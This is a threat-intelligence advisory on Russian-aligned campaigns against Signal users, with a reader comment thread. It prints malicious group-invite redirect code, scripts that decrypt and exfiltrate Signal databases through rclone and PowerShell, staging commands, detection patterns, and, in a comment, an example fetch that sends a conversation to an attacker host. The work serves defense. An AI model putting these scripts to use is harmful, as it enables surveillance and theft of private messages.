Multiple Russia-aligned threat actors actively targeting Signal Messenger

2025-02-19 14:05, cloud.google.com

Russia state-aligned threat actors target Signal Messenger accounts used by individuals of interest to Russia's intelligence services.

Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia's re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional threat actors and regions outside the Ukrainian theater of war.

Signal's popularity among common targets of surveillance and espionage activity—such as military personnel, politicians, journalists, activists, and other at-risk communities—has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats.

We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features.

The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app's legitimate "linked devices" feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim's secure conversations without the need for full-device compromise.

  • In remote phishing operations observed to date, malicious QR codes have frequently been masked as legitimate Signal resources, such as group invites, security alerts, or device-pairing instructions from the Signal website.

  • In more tailored remote phishing operations, malicious device-linking QR codes have been embedded in phishing pages crafted to appear as specialized applications used by the Ukrainian military.

  • Beyond remote phishing and malware delivery operations, we have also seen malicious QR codes being used in close-access operations. APT44 (aka Sandworm or Seashell Blizzard, a threat actor attributed by multiple governments to the Main Centre for Special Technologies (GTsST) within the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU), commonly known as the GRU) has worked to enable forward-deployed Russian military forces to link Signal accounts on devices captured on the battlefield back to actor-controlled infrastructure for follow-on exploitation.

Notably, this device-linking concept of operations has proven to be a low-signature form of initial access due to the lack of centralized, technology-driven detections and defenses that can be used to monitor for account compromise via newly linked devices; when successful, there is a high risk that a compromise can go unnoticed for extended periods of time.

UNC5792: Modified Signal Group Invites

To compromise Signal accounts using the device-linking feature, one suspected Russian espionage cluster tracked as UNC5792 (which partially overlaps with CERT-UA's UAC-0195) has altered legitimate "group invite" pages for delivery in phishing campaigns, replacing the expected redirection to a Signal group with a redirection to a malicious URL crafted to link an actor-controlled device to the victim's Signal account.

  • In these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled infrastructure designed to appear identical to a legitimate Signal group invite.

  • In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
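Because this swap leaves a distinctive artifact (a device-linking URI where a group URI should appear), defenders can hunt for it in captured phishing-page source. A minimal sketch in Python; the function name and regex are illustrative, not from any production tool:

```python
import re

# Signal's device-linking URI scheme abused in these campaigns.
# A legitimate group invite redirects to "sgnl://signal.group/..." instead.
LINKDEVICE_RE = re.compile(r"sgnl://linkdevice\?[^\s'\"]*uuid=", re.IGNORECASE)

def contains_linkdevice_uri(page_source: str) -> bool:
    """Flag HTML/JS content that embeds a Signal device-linking URI."""
    return bool(LINKDEVICE_RE.search(page_source))
```

A page that only ever redirects to `sgnl://signal.group/...` will not trigger this check, while the modified redirect code shown below will.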

https://storage.googleapis.com/gweb-cloudblog-publish/images/fig1-signal.max-1600x1600.png

Figure 1: Example modified Signal group invite hosted on UNC5792-controlled domain "signal-groups[.]tech"

function doRedirect() {
    if (window.location.hash) {
        var redirect = "sgnl://signal.group/" + window.location.hash
        document.getElementById('go-to-group').href = redirect
        window.location = redirect
    } else {
        document.getElementById('join-button').innerHTML = "No group found."
    }
}
window.onload = doRedirect

Figure 2: Typical legitimate group invite code for redirection to a Signal group

function doRedirect() {
    var redirect = 'sgnl://linkdevice?uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D&pub_key=Ba0212mHrGIy4t%2FzCCkKkRKwiS0osyeLF4j1v8DKn%2Fg%2B'
    //redirect=encodeURIComponent(redirect)
    document.getElementById('go-to-group').href = redirect
    window.location = redirect
}
window.onload = doRedirect

Figure 3: Example of UNC5792 modified redirect code used to link the victim's device to an actor-controlled Signal instance
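The URI in Figure 3 carries everything Signal needs to pair the attacker's device: a device UUID and a percent-encoded public key. As a rough illustration of what those parameters decode to, a short standard-library Python sketch (the helper name is ours):

```python
from urllib.parse import urlsplit, parse_qs

def parse_linkdevice_uri(uri: str) -> dict:
    """Decode the uuid and pub_key parameters of a sgnl://linkdevice URI."""
    query = urlsplit(uri).query  # everything after "linkdevice?"
    return {k: v[0] for k, v in parse_qs(query).items()}

# The parameters below are the (public) values from Figure 3.
fields = parse_linkdevice_uri(
    "sgnl://linkdevice?uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D"
    "&pub_key=Ba0212mHrGIy4t%2FzCCkKkRKwiS0osyeLF4j1v8DKn%2Fg%2B"
)
# Percent-decoding recovers base64-style values for both parameters.
```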

UNC4221: Signal Phishing Kits Mimicking Kropyva

UNC4221 (tracked by CERT-UA as UAC-0185) is another Russia-linked threat actor that has actively targeted Signal accounts used by Ukrainian military personnel. The group operates a tailored Signal phishing kit designed to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery guidance. Similar to the social engineering approach used by UNC5792, UNC4221 has also attempted to mask its device-linking functionality as an invite to a Signal group from a trusted contact. Different variations of this phishing kit have been observed, including:

  • Phishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate device-linking instructions provisioned by Signal (Figure 4)

  • Phishing websites with the malicious device-linking QR code directly embedded into the primary Kropyva-themed phishing kit (Figure 5)

  • In earlier operations in 2022, UNC4221 phishing pages were crafted to appear as a legitimate security alert from Signal (Figure 6)

https://storage.googleapis.com/gweb-cloudblog-publish/images/fig4-signal.max-1200x1200.png

Figure 4: Malicious device-linking QR code hosted on UNC4221-controlled domain "signal-confirm[.]site"

https://storage.googleapis.com/gweb-cloudblog-publish/images/fig5-signal.max-1200x1200.png

Figure 5: UNC4221 phishing page mimicking the networking component of Kropyva hosted at "teneta.add-group[.]site". The page invites the user to "Sign in to Signal" (Ukrainian: "Авторизуватись у Signal"), which in turn displays a QR code linked to an UNC4221-controlled Signal instance.

https://storage.googleapis.com/gweb-cloudblog-publish/images/fig6-signal.max-1400x1400.png

Figure 6: Phishing page crafted to appear as a Signal security alert hosted on UNC4221-controlled domain signal-protect[.]host

Notably, as a core component of its Signal targeting, UNC4221 has also used a lightweight JavaScript payload tracked as PINPOINT to collect basic user information and geolocation data using the browser's GeoLocation API. In general, we expect secure messages and location data to frequently feature as joint targets in future operations of this nature, particularly in the context of targeted surveillance operations or support to conventional military operations.

Wider Russian and Belarusian Efforts to Steal Messages From Signal

Beyond targeted efforts to link additional actor-controlled devices to victim Signal accounts, multiple known and established regional threat actors have also been observed operating capabilities designed to steal Signal database files from Android and Windows devices.

  • APT44 has been observed operating WAVESIGN, a lightweight Windows Batch script, to periodically query Signal messages from a victim's Signal database and exfiltrate those most recent messages using Rclone (Figure 7).

  • As reported in 2023 by the Security Service of Ukraine (SSU) and the UK's National Cyber Security Centre (NCSC), the Android malware tracked as Infamous Chisel, attributed by those organizations to Sandworm, is designed to recursively search Android devices for files matching a list of extensions, including the local databases of a series of messaging applications such as Signal.

  • Turla, a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the Federal Security Service (FSB) of the Russian Federation, has also operated a lightweight PowerShell script in post-compromise contexts to stage Signal Desktop messages for exfiltration (Figure 8).

  • Extending beyond Russia, Belarus-linked UNC1151 has used the command-line utility Robocopy to stage the contents of file directories used by Signal Desktop to store messages and attachments for later exfiltration (Figure 9).

if %proflag%==1 (
    C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";" ".recover" > NUL
    copy /y %new% C:\ProgramData\Signal\Storage\Signal\sqlorig\db.sqlite
    C:\ProgramData\Signal\Storage\rc.exe copy -P -I --log-file=C:\ProgramData\Signal\Storage\rclog.txt --log-level INFO C:\ProgramData\Signal\Storage\Signal\sqlorig si:SignalFresh/sqlorig
    del C:\ProgramData\Signal\Storage\Signal\log*
    rmdir /s /q C:\ProgramData\Signal\Storage\sql
    move C:\ProgramData\Signal\Storage\Signal\sql C:\ProgramData\Signal\Storage\sql
) ELSE (

    C:\ProgramData\Signal\Storage\sqlcipher.exe %old% "PRAGMA key=""x'%key%'"";" ".recover" > NUL
    C:\ProgramData\Signal\Storage\sqlcipher.exe %old% "PRAGMA key=""x'%key%'"";select count(*) from sqlite_master;ATTACH DATABASE '%old_dec%' AS plaintext KEY '';SELECT sqlcipher_export('plaintext');DETACH DATABASE plaintext;"
    C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";" ".recover" > NUL
    C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";select count(*) from sqlite_master;ATTACH DATABASE '%new_dec%' AS plaintext KEY '';SELECT sqlcipher_export('plaintext');DETACH DATABASE plaintext;"
    C:\ProgramData\Signal\Storage\sqldiff.exe --primarykey --vtab %old_dec% %new_dec% > %diff_name%
    del /s %old_dec% %new_dec%

    rmdir /s /q C:\ProgramData\Signal\Storage\sql
    move C:\ProgramData\Signal\Storage\Signal\sql C:\ProgramData\Signal\Storage\sql

    powershell -Command "move C:\ProgramData\Signal\Storage\log.tmp C:\ProgramData\Signal\Storage\Signal\log$(Get-Date -f """ddMMyyyyHHmmss""").tmp"
)

Figure 7: Code snippet from WAVESIGN used by APT44 to exfiltrate Signal messages

$TempPath = $env:tmp
$TempPath = $env:temp

$ComputerName = $env:computername
$DFSRoot = "\\redacted"
$RRoot = $DFSRoot + "resource\"

$frand = Get-Random -Minimum 1 -Maximum 10000

Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\config.json" | Out-File $treslocal -Append
Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\sql\db.sqlite" | Out-File $treslocal -Append


$file1 = $ComputerName + "_" + $frand + "sig.zip"
$zipfile = $TempPath + "\" + $file1
$resfile = $RRoot + $file1
Compress-Archive -Path "C:\Users\..\AppData\Roaming\SIGNAL\config.json" -DestinationPath $zipfile
Copy-Item -Path $zipfile -Destination $resfile -Force
Remove-Item -Path $zipfile -Force

Figure 8: PowerShell script used by Turla to exfiltrate Signal messages
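The script's interest in config.json alongside db.sqlite is the key detail: Signal Desktop encrypts its message database with SQLCipher, and older releases stored the raw database key in config.json (current releases can protect it with the OS keystore). A minimal sketch of how that legacy file yields the decryption PRAGMA also visible in the WAVESIGN snippet above; the file layout shown is the legacy one and the function name is ours:

```python
import json
from pathlib import Path

def sqlcipher_pragma_from_config(config_path: str) -> str:
    """Build the SQLCipher key PRAGMA from Signal Desktop's legacy config.json.

    Assumes the legacy layout {"key": "<hex>"}; newer Signal Desktop
    versions may hold an OS-encrypted key instead of a raw one.
    """
    cfg = json.loads(Path(config_path).read_text())
    return "PRAGMA key = \"x'%s'\";" % cfg["key"]
```

This is why stealing db.sqlite alone is not enough for an attacker, and why both Turla's script and WAVESIGN handle the key material as well.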

C:\Windows\system32\cmd.exe /C cd %appdata% && robocopy "%userprofile%\AppData\Roaming\Signal" C:\Users\Public\data\signa /S

Figure 9: Robocopy command used by UNC1151 to stage Signal file directories for exfiltration
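Across Figures 7 through 9, the common thread is a copy utility pointed at a Signal profile or staging directory, which suggests a simple hunting heuristic for defenders with process command-line telemetry. A hypothetical sketch (the tool list and function are illustrative; the path fragments come from the commands above):

```python
# Path fragments seen in the staging commands above (Figures 7 and 9).
SIGNAL_PROFILE_MARKERS = (
    r"appdata\roaming\signal",  # Signal Desktop profile dir (Figure 9)
    r"signal\storage",          # staging dir used by WAVESIGN (Figure 7)
)

# Copy/sync tools observed in, or plausible for, this staging pattern.
COPY_TOOLS = ("robocopy", "rclone", "xcopy", "copy-item")

def is_suspicious_cmdline(cmdline: str) -> bool:
    """Flag command lines that pair a copy tool with a Signal data path."""
    lowered = cmdline.lower()
    return any(t in lowered for t in COPY_TOOLS) and any(
        m in lowered for m in SIGNAL_PROFILE_MARKERS
    )
```

Legitimate backup software can trip a heuristic like this, so in practice it would feed a triage queue rather than block outright.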

The operational emphasis on Signal from multiple threat actors in recent months serves as an important warning for the growing threat to secure messaging applications that is certain to intensify in the near-term. When placed in a wider context with other trends in the threat landscape, such as the growing commercial spyware industry and the surge of mobile malware variants being leveraged in active conflict zones, there appears to be a clear and growing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of individuals who rely on secure messaging applications to safeguard their online activity.

As reflected in wide-ranging efforts to compromise Signal accounts, this threat to secure messaging applications is not limited to remote cyber operations such as phishing and malware delivery; it critically includes close-access operations in which a threat actor can secure brief access to a target's unlocked device. Equally important, this threat is not limited to Signal: it extends to other widely used messaging platforms, including WhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the aforementioned Russia-aligned groups in recent months. For an example of this wider targeting interest, see Microsoft Threat Intelligence's recent blog post on a COLDRIVER (aka UNC4057 and Star Blizzard) campaign attempting to abuse the linked device feature to compromise WhatsApp accounts.

Potential targets of government-backed intrusion activity targeting their personal devices should adopt practices to help safeguard themselves, including:

  • Enable screen lock on all mobile devices using a long, complex password with a mix of uppercase and lowercase letters, numbers, and symbols. Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

  • Install operating system updates as soon as possible and always use the latest version of Signal and other messaging apps.

  • Ensure Google Play Protect is enabled, which is on by default on Android devices with Google Play Services. Google Play Protect checks your apps and devices for harmful behavior and can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.

  • Audit linked devices regularly for unauthorized devices by navigating to the "Linked devices" section in the application's settings.

  • Exercise caution when interacting with QR codes and web resources purporting to be software updates, group invites, or other notifications that appear legitimate and urge immediate action.

  • If available, use two-factor authentication such as fingerprint, facial recognition, a security key, or a one-time code to verify when your account is logged into or linked to a new device.

  • iPhone users concerned about targeted surveillance or espionage activity should consider enabling Lockdown Mode to reduce their attack surface.

To assist organizations hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

See Table 1 for a sample of relevant indicators of compromise.

UNC5792

  e078778b62796bab2d7ab2b04d6b01bf: example of altered group invite HTML code

  Fake group invite phishing pages:
    add-signal-group[.]com
    add-signal-groups[.]com
    group-signal[.]com
    groups-signal[.]site
    signal-device-off[.]online
    signal-group-add[.]com
    signal-group[.]site
    signal-group[.]tech
    signal-groups-add[.]com
    signal-groups[.]site
    signal-groups[.]tech
    signal-security[.]online
    signal-security[.]site
    signalgroup[.]site
    signals-group[.]com

UNC4221

  Device-linking instructions phishing pages:
    signal-confirm[.]site
    confirm-signal[.]site

  Fake Signal security alert:
    signal-protect[.]host

  Fake Kropyva group invites:
    teneta.join-group[.]online
    teneta.add-group[.]site
    group-teneta[.]online
    helperanalytics[.]ru
    teneta[.]group
    group.kropyva[.]site

APT44

  Dynamically generated device-linking QR code provisioned by APT44:
    150.107.31[.]194:18000

  WAVESIGN batch scripts:
    a97a28276e4f88134561d938f60db495
    b379d8f583112cad3cf60f95ab3a67fd
    b27ff24870d93d651ee1d8e06276fa98

Table 1: Relevant indicators of compromise

See Table 2 for a summary of the different actors, tactics, and techniques used by Russia and Belarus state-aligned threat actors to target Signal messages.

Threat Actor | Tactic | Technique

UNC5792 | Linked device | Remote phishing operations using fake group invites to pair a victim's Signal messages to an actor-controlled device

UNC4221 | Linked device | Remote phishing operations using fake military web applications and security alerts to pair a victim's Signal messages to an actor-controlled device

APT44 | Linked device | Close-access physical device exploitation to pair a victim's Signal messages to an actor-controlled device

APT44 | Signal Android database theft | Android malware (Infamous Chisel) tailored to exfiltrate Signal database files

APT44 | Signal Desktop database theft | Windows Batch script (WAVESIGN) tailored to periodically exfiltrate recent Signal messages via Rclone

Turla | Signal Desktop database theft | PowerShell script used in post-compromise contexts to stage Signal Desktop messages for exfiltration

UNC1151 | Signal Desktop database theft | Use of Robocopy to stage Signal Desktop file directories for exfiltration

Table 2: Summary of observed threat activity targeting Signal messages

Comments

  • By vetrom, 2025-02-19 18:48 (3 replies)

    Signal (and basically any app) with a linked devices workflow has been risky for a while now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.

    I'm only surprised it took this long for an in-the-wild attack to appear in open literature.

    It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):

        "We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"

    • By diputsmonro, 2025-02-19 19:54 (5 replies)

      If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.

      Thus, engaging on this attack would seem to require hardware access to one of the victims' devices (or some other backdoor), in which case you've already lost.

      Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.

      • By vetrom, 2025-02-19 20:52 (2 replies)

        No, it means that if you approve a device to link, and you later have reason to unlink the device, you can't establish absolutely that the unlinked device can no longer access messages, or decrypt messages involving an account, breaking the forward-secrecy guarantees.

        That leaves you with the only remedy for a Signal account that has accepted a link to a 'bad device' being to burn the whole account (maybe rotating safety numbers/keys would be sufficient; I am uncertain there). If you can prove the malicious link was only a link, then yeah, the attack I described is incomplete, but the issues in general with linked devices and the remedies described are the important bits, I think.

        • By inor0gu, 2025-02-19 21:07 (1 reply)

          That's not what the attack does though - they have access to your private key, so they can complete the linking protocol without your phone and add as many devices as they want (up to the allowed limit). If you add a bad device, you are screwed from that moment on, assuming you don't sync your chat history.

          You can always see how many devices a user has: they have a unique integer id, so if I want to send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly then that is an oversight for sure, but I don't think it's the case anymore.

          Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the same view of your account (keys), which is why key transparency is such an important feature.

          • By rendaw, 2025-02-20 02:48

            That sounds exactly like what GP wrote.

        • By UltraSane, 2025-02-19 22:07

          That is really quite bad.

      • By vlovich123, 2025-02-19 21:04 (1 reply)

        It sounds like all that's needed is a device that had been linked in the past. Unlinking doesn't have the security requirements you'd think it would and there's a phishing attack to make scanning a QR code trigger a device link (which seems really really bad if the user doesn't even have to take much action)

        • By inor0gu, 2025-02-19 21:16 (2 replies)

          Your phone (primary device) and the linked ones have to share the IK, since that is the "root of trust" for your account: with that you generate new device keys, renew them, and so on.

          Those keys are backed by Keystore on Android, and some similar system on Windows/Linux; I'd assume the same for macOS/iOS (but I don't know the details). So it's not as simple as just having access to your laptop, they'd need at least root.

          Phishing is always tricky, probably impossible to counter sadly - each one of us would be susceptible at the wrong moment.

          • By vlovich123, 2025-02-20 06:10 (1 reply)

            I think the point is that as a user you expect revocation of trust to protect you going forward, yet it doesn't (e.g., the server shouldn't be forwarding new messages to an unlinked device). That's a design decision Signal made, but clearly it's one that leaves you open to harm. Moreover, it's a dangerous decision because after obtaining the IK in some way (e.g., from a stolen device) you're able to essentially take over the account surreptitiously without the user ever knowing (i.e., no phishing needed). As an end user these are surprising design choices, and that Signal discounted this as not part of their threat model suggests to me that their threat model has an intentional or unintentional hole; second-hand devices that aren't wiped are common, and jailbreaks exist.

            This isn’t intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or impersonating sending messages. A simple one would be that each new device establishes a new key that the server recognizes as pertaining to that device and notifications are encrypted with a per-device key when sending to a device and require outbound messages to be similarly encrypted. There’s probably better schemes than this naive approach.

            • By inor0gu, 2025-02-20 08:16

              Revocation of trust is always a tricky issue, you can look at TLS certificates to see what a can of worms that is.

              The Signal server does not forward messages to your devices, and the list of devices someone has (including your own) can and has to be queried to communicate with them, since each device will establish unique keys signed by that IK, so it isn't as bad as having invisible devices that you'd never be aware of. That of course relies on you being able to ensure the server is honest and consistent, but this is already work in progress they are doing.

              I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here, if your phone is informed a new device was added, without you pressing the Link button, you can assume something's phishy), (2) how do you properly warn people when something bad happens and (3) how do you inform users such that you both have a similar mental model. You also have to achieve these things without overwhelming them.

          • By vlovich123, 2025-02-20 03:38

            I would be surprised if there aren’t ways to design it cryptographically to ensure that an unlinked device doesn’t have access to future messages. The problem with how Signal has designed it is that is a known weakness that Signal has dismissed in the past.

      • By reactordev, 2025-02-19 20:55 (1 reply)

        “Just install this chrome browser extension” is all it takes now. Hell, you can even access cookies and previously visited sites from within the browser. All it takes is some funky ad, or chrome extension, or some llama-powered toolbar to gain access to be able to do exactly that.

        Background services on devices have been a thing for a while too. Install an app (which you grant all permissions to when asked) and bam, a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc.

        • By noname120, 2025-02-19 22:45 (1 reply)

          How is that related in any way to Signal?

          • By reactordev, 2025-02-19 22:56

            My point is that anything you install on your device is a vector. Can install MITM attacks. Can read your data, etc. Sidecar attacks.

            This was classic phishing though

      • By josh2600, 2025-02-19 20:46

        This is my read as well. Just double clicking here.

    • By inor0gu, 2025-02-19 20:58

      The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.

      Outside of lab settings, the only way to do that is: (1) you get root access to the user's device, or (2) you compromise a recent chat backup.

      The campaign Google found is akin to phishing, so not as problematic on a technical level. How you warn someone they might be doing something dangerous is an entire can of worms in Usable Security... but it's gonna become even more relevant for Signal once adding a new linked device will also copy your message history (and last 45 days of attachments).

    • By tomrod, 2025-02-19 23:07 (1 reply)

      If one doesn't use the linked device feature, does that impact this threat surface?

      • By inor0gu, 2025-02-19 23:34

        About the paper: if someone has gotten access to your identity (private) key, you are compromised, either with their attack (adding a linked device) or just getting MitM'ed and all messages decrypted. The attacker won.

        The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.

  • By parhamn, 2025-02-19 21:54 (9 replies)

    One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean, at the end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further, to the OS that the rendering is done on.

    The last bit adds an interesting facet: even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because it's particularly tricky to load your own build of an application.

    And then if you did that, you still need to do it all on the other side of the chat too, assuming it's a multi-party chat.

    You can have every cute protocol known to man, best encryption algorithms on the wire, etc., but at the end of the day it's all trust.

    I mention this because these days I worry more that using something like Signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop, I'd focus my resources on Signal users, they have the most to hide.

    Sometimes it all feels pointless (besides encrypted storage).

    I also feel weird that the bulk of the discussion is on the hypothetical validity of a security protocol, usually focused on the maths, when all of that can be subverted with a fetch("https://malevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

    • By inor0gu, 2025-02-19 22:05 (1 reply)

      You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicon, through the OS, all the way to how packets are forwarded from you to the person on the other end.

      This makes that entire goal moot; eliminating trust seems impossible. You're just shifting around the things you're willing to trust, or hiding them behind an abstraction.

      I think what will become more important is to have enough mechanisms to be able to categorically prove if an entity you trust to a certain extent is acting maliciously, and hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to point distrust.

      A few examples:

        - certificate transparency logs, so your traffic is not MitM'ed
        - reproducible builds, so the binary you get matches the public open source code you expect it does (regardless of its quality)
        - key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's

      • By parhamn, 2025-02-19 22:15 (2 replies)

        > This makes that entire goal moot

        I agree. Perhaps it's why I find discussions like nonce lengths and randomness sources almost insane (in the sense of willfully missing the forest for the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.

        • By inor0gu, 2025-02-19 22:27 (1 reply)

          I don't think they are insane, they are quite useful when designing security mechanisms, while at the same time being utter noise for the end-user benefiting from that system.

          > If you're building a chip to generate prime numbers I do surely hope you know how to select randomness or make constant time & branch free algorithms, just like an engineer designing elevators better know what should be the tensile strength of the cable it'll use. In either cases, it's mumbo jumbo for me, and I just need to get on with my day.

          Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.

          • By parhamn 2025-02-203:06

            I almost find it worse. Using your analogy, it's akin to doing atomic simulations on the elevator cable quality while the elevator car is missing a floor.

        • By 542354234235 2025-02-2017:24

          But depending on your threat model, it can still be useful. If a state actor has a backdoor into something, would they burn that capability to get you? If you are a dissident in a totalitarian government, you would expect them to throw everything at you and not tell anyone how or why. If you are a terrorism suspect who could be tried in a “classified” setting, you would expect them to throw everything at you. If you are Jane Average passing nudes and talking about doing a little Molly last weekend, and would have a lawyer go through discovery, you are probably safe.

    • By BrenBarn 2025-02-207:281 reply

      I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)

      There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.

      I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.

      • By Cyphase 2025-02-207:401 reply

        At a casual glance, any E2EE system can be reduced to your ironclad legally guaranteed (ILG) system by having the platform keep a copy of the key(s), for instance. So it doesn't have to be a one-or-the-other choice.

        • By BrenBarn 2025-02-2010:36

          How does giving the platform the keys guarantee legal consequences for them if they use the keys to read your messages?

    • By lmm 2025-02-201:15

      > Sometimes it all feels pointless

      Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).

      > I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

      There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.

    • By redleader55 2025-02-1923:41

      I think that part of what you are talking about is sometimes called "attestation": basically a signature, with a root that you trust, that confirms beyond doubt the provenance of the entity (phone + OS + app) that you interact with.

      Android has that and can confirm to a third party that the phone is running, for example, a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone running LineageOS (as an example) as "original" software.

      The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.

      A fully transparent attested artifact, which doesn't involve blind trust in an entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of a signature-based root of trust.

      All of the above is technically possible, but not implemented today in a way that makes this feasible. I'm confident that with enough interest it will eventually be implemented.
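      The ledger-based variant described above can be sketched in a few lines. This is a toy, in-memory stand-in for a public transparency log (all component names, versions, and entries are hypothetical); a real system would additionally need hardware-backed, signed attestation statements rather than a bare hash lookup:

      ```python
      import hashlib

      # Hypothetical public ledger: (component, version) -> SHA-256 digest
      # of the reproducibly built binary everyone is expected to run.
      LEDGER = {
          ("messenger-app", "1.0.0"): hashlib.sha256(b"official release bytes").hexdigest(),
      }

      def attest(component: str, version: str, binary: bytes) -> bool:
          """Accept a remote party's claimed software only if the binary it
          presents hashes to the digest recorded in the public ledger."""
          expected = LEDGER.get((component, version))
          return expected is not None and hashlib.sha256(binary).hexdigest() == expected
      ```

      The point of the ledger is that the same check is reproducible by anyone, so no single party (Google or otherwise) has to be trusted as the sole root.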

    • By MediumOwl 2025-02-2013:29

      > I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

      I think your comment in general, and this part in particular, forgets the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on public wifi was playing Russian roulette, and signals intelligence agencies were having the time of their lives.

      The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.

    • By solarkraft 2025-02-208:49

      > "E2E encryption" really requires the client to be built and verified by the end user

